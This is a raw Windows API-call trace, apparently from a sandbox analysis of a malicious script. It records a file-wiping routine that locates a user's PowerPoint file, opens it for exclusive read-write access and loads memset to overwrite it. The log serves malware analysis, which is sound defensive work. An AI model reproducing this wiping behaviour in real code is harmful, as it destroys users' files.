lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.038] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0172.038] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.038] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0172.038] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.038] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0172.038] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.038] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.038] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0172.038] FreeLibrary (hLibModule=0x74f20000) returned 1 [0172.038] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.038] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.038] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.039] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.040] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.043] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.043] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0172.043] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.044] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.044] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6f89b0, ftCreationTime.dwHighDateTime=0x1d5e748, ftLastAccessTime.dwLowDateTime=0xd1d81f90, ftLastAccessTime.dwHighDateTime=0x1d5d846, ftLastWriteTime.dwLowDateTime=0xd1d81f90, ftLastWriteTime.dwHighDateTime=0x1d5d846, nFileSizeHigh=0x0, nFileSizeLow=0x6db5, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gVll7Y--hWx_Sucb_5p.ppt", cAlternateFileName="GVLL7Y~1.PPT")) returned 0x90ae18 [0172.044] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0172.044] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.044] CharLowerBuffW (in: lpsz="byte[28085]", cchLength=0xb | out: lpsz="byte[28085]") returned 0xb [0172.045] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.045] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0172.045] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.045] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0172.046] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0172.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0172.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0172.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0172.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2658 [0172.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2658, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0172.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0172.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0172.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0172.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0172.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0172.046] FreeLibrary (hLibModule=0x75c90000) returned 1 [0172.047] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0172.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0172.047] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.047] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0172.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0172.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0172.047] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0172.047] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0172.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0172.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0172.047] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0172.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0172.048] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0172.048] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0172.048] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0172.048] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0172.048] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0172.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0172.049] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.049] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.049] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.049] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.049] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0172.049] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0172.049] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0172.049] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0172.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0172.050] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0172.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0172.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0172.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0172.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0172.050] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0172.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0172.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0172.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0172.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0172.050] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0172.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0172.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3f0 [0172.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba3f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0172.051] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\gvll7y--hwx_sucb_5p.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0172.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0172.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0172.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0172.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0172.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0172.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0172.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0172.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0172.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0172.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0172.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9cbf40 | out: hHeap=0x8a0000) returned 1 [0172.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0172.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0172.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0172.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0172.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0172.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0172.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0172.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0172.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0172.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0172.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0172.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0172.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0172.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0172.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0172.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0172.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0172.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0172.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0172.053] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0172.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0172.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 